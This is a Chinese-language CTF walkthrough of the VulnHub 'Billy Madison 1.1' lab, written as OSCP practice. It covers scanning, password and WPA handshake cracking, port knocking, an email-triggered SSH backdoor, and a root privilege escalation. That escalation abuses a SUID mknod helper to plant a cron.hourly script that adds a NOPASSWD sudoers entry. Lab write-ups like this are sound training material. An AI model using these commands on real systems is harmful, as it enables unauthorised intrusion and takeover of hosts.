OSCP - vulnhub BILLY MADISON: 1.1 靶机测试

仅以此文来记录我的oscp靶场训练过程 

Billy Madison: 1.1 ~ VulnHub

拿到了靶机之后改为桥接导入VMware

kali和靶机全部上线后,nmap扫描 192.168.165.0/24 

发现靶机ip为192.168.165.156

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第1张图片

 hping3

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第2张图片

nmap

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第3张图片

 先跑一下ssh的弱口令 虽然没啥用

ef73a168d77a45b8a9a0a48ed2024996.png

ncat -v 192.168.165.156 23

获取到了一些信息

2b4e1a0a80b44cff90292e6bd947f866.png

 获取到了一个密码rkfpuzrahngvat 及解密方式ROT

随便找了个解密网站CTF在线工具-CTF工具|CTF编码|CTF密码学|CTF加解密|程序员工具|在线编解码

ROT13出来为 exschmenuating

打开网页访问一下192.168.165.156:69 的 wordpress 但是打不开 有点奇怪 

 

但是不妨碍用wpscan扫一下

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第4张图片

 获取到了一个用户admin

打开网页访问一下192.168.165.156:80

没啥有用的 Billy 可能是一个里面的用户名

dirb 跑一下看看

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第5张图片

翻了翻没发现什么好东西 发现下面的de da 全是不同语言的页面罢了

还有139和445 samba

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第6张图片

发现可以连接到EricsSecretStuff

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第7张图片

基本用法

 get xxxxx     ;下载某个文件
 put xxxxx     ;上传某个文件
 mget *          ;下载当前目录下所有文件
 tar c test.tar notes/   ; 打包notes目录下所有文件

 尝试上传写入文件看看

4ac46d529e19400c801534bb6ec5a89e.png

 不行 尝试下载看看

bd2c051c2a4d440a9554aceb933a11f1.png

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第8张图片

 告诉我们有一个后门

到这貌似只剩下 2525 这个端口

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第9张图片

直到现在没有什么思路了 看看老外的wp

发现之前的 exschmenuating 是一个目录

一个新页面  得到了一个信息 veronica 会以的名字的一部分 作为她的文件名 突然就想到了rockyou.txt  查看日志 发现我的ip被禁了 貌似是因为连接23端口

808685343ac34c22829004ea870bbe85.png

cat /usr/share/wordlists/rockyou.txt | grep -i veronica > /home/kali/Desktop/111.txt

使用grep 导出 rockyou 含有 veronica 的字典 然后dirb爆破

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第10张图片

找到了 下载下来 使用wireshark 打开

 总共6个邮件 都是发往2525端口的

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: [email protected]
From: [email protected]
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just click here to install it, k?  

Thanks. -Eric


.
QUIT


EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

https://www.youtube.com/watch?v=z5YU7JwVy7s

-VV


.
QUIT


EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric


.
QUIT

EHLO kali
MAIL FROM:
RCPT TO:
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: [email protected]
From: [email protected]
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V


.
QUIT
 

通过对话得知 这个 eric 骗 Veronica 下载了个病毒软件 并且还有个ftp服务器 除非连接到 Spanish Armada ???   账号密码为 eric  ericdoesntdrinkhisownpee.

打开 https://www.youtube.com/watch?v=z5YU7JwVy7s 开始英语听力 

大致意思是 1066 1215 Spanish Armada 1466 67 1469 1514 1981 1986 Please do not do that

用 shell 敲击一下端口

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn -host-timeout 201 -max-retries 0 -p $x 192.168.165.156; done

21端口打开可以连接了 使用之前的账号密码 发现有问题 后来百度了一下 输入 passive 即可正常

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第11张图片

get .notes 下载下来打开后显示如下 其他的下载下来有点看不懂

Ugh, this is frustrating.  I managed to make a system account for myself. I also managed to hide Billy's paperwhere he'll never find it.  However, now I can't find it either :-(. To make matters worse, my privesc exploits aren't working.  One sort of worked, but I think I have it installed all backwards.If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper!Fortunately, my SSH backdoor into the system IS working.  All I need to do is send an email that includesthe text: "My kid will be a ________ _________"Hint: https://www.youtube.com/watch?v=6u7RsW5SAgsThe new secret port will be open and then I can login from there with my wifi password, which I'msure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time tocheck Veronica's.-EG

大致意思就是说 需要知道一个wifi密码 我们查看了billy的ftp发现没有 那就只有 Veronica 的ftp有

查看视频发现 空白的话为 My kid will be a Soccer Player 并且需要发送一封电子邮件 可能会开启一个新的ssh端口

联系到之前Veronica 会将他的名字当成密码的一部分 我们爆破一下Veronica的ftp

登录成功后发现了两个文件 eg-01.cap  email-from-billy.eml

email-from-billy.eml 如下

        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)Date: Sat, 20 Aug 2016 12:55:40 -0500To: [email protected]: [email protected]: test Sat, 20 Aug 2016 12:55:40 -0500X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/Eric's wifiHey VV,It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.I wasn't completely successful yet, but at least I got a start.I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)Kisses,Billy

看来Billy 和 Eric 两个人都挺核善的 这个里面没有wifi密码

突然我想起了 之前使用的Aircrack-ng

获取的cap包的命名方式就很像抓到握手包的样子 可以尝试破解一下 这种破解速度很快所以我直接导入了 rockyou.txt 破解

aircrack-ng eg-01.cap -w /usr/share/wordlists/rockyou.txt

 OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第12张图片

 直接跑出来了获取到了wifi名称 EricGordon  密码 triscuit*

然后尝试匿名登录 获得如下信息 匿名登录 密码为随便一个邮箱即可

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第13张图片

连接靶机2525端口  模仿之前抓到的cap包的邮件格式发送邮件 将内容更改为

My kid will be a soccer player

发送即可 重新扫描一下 发现目标开启了 

<-  220 BM ESMTP SubEthaSMTP null -> EHLO kali<-  250-BM<-  250-8BITMIME<-  250-AUTH LOGIN<-  250 Ok -> MAIL FROM:<-  250 Ok -> RCPT TO:<-  250 Ok -> DATA<-  354 End data with . -> Date: Thu, 15 Sep 2016 07:57:56 -0400 -> To: [email protected] -> From: [email protected] -> Subject: My kid will be a soccer player -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/ -> -> My kid will be a soccer player -> -> .<-  250 Ok -> QUIT<-  221 Bye=== Connection closed with remote host.

或者也可以

swaks --to [email protected] --from [email protected] --server 192.168.165.156:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"

重新扫描一下 发现开启了 1974 端口 开启的openssh 7.2p2

87897d36702147fc9964b6eeab26cd17.png

 searchsploit一下 貌似只有枚举用户可以用

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第14张图片

成功连接 eric 的ssh   准备提权

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第15张图片

find / -user root -perm -4000 -ls 2>/dev/null

发现/usr/local/share/sgml/donpcgd 貌似可以在任何位置创建一个文件

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第16张图片

eric@BM:~$ /usr/local/share/sgml/donpcgd /dev/null /etc/test#### mknod(/etc/testing,21b6,103)eric@BM:~$ ls -lah /etc/testcrw-rw-rw- 1 root root 1, 3 Sep 15 10:22 /etc/testeric@BM:~$ touch /tmp/testeric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test#### mknod(/etc/cron.hourly/test,81b4,0)eric@BM:~$ echo -e '#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/testeric@BM:~$ chmod +x /etc/cron.hourly/testeric@BM:~$ cat /etc/cron.hourly/test#!/bin/bashecho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

预计等一个小时 然后sudo su

f646f20a06f647859a50a6a8dd8cfe75.png

已经获取了root

但是我们还要找Billy的丢失的文件

最后在根目录 /PRIVATE 文件夹找到了点有用的东西

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第17张图片

需要我们使用cewl从 Wikipedia 条目生成一个词表

63aa1e5aa08c4909b42b036689caee46.png

正常来说没有proxy根本生成不了 推荐 proxychains

proxychains cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第18张图片

挂了proxy后生成成功

接下来破解需要 truecrack kali直接安装即可

truecrack -w billy-wiki.list -t BowelMovement

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第19张图片

跑出密码后 最后需要安装 veracrypt  

 openSUSE Software      kali 安装推荐看这篇文章安装 也直接直接使用下面的命令

echo 'deb http://download.opensuse.org/repositories/home:/stevenpusser:/veracrypt/Debian_10/ /' | sudo tee /etc/apt/sources.list.d/home:stevenpusser:veracrypt.listcurl -fsSL https://download.opensuse.org/repositories/home:stevenpusser:veracrypt/Debian_10/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/home_stevenpusser_veracrypt.gpg > /dev/nullsudo apt updatesudo apt install veracrypt

必须要先创建个文件夹再执行命令进去 获得一个zip文件 再解压一次

 解密后得到两个文件

mkdir billyveracrypt -tc BowelMovement billy

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第20张图片

 解压完获得了两个文件

OSCP - vulnhub BILLY MADISON: 1.1 靶机测试_第21张图片

至此结束了 不得不说还是很有趣的 扩展了思路 感觉很不错的一个靶场 学到了很多命令 最头疼的一点就是21和1974端口 重启靶机之后重新执行命令才能打开

你可能感兴趣的:(oscp,功能测试,网络安全)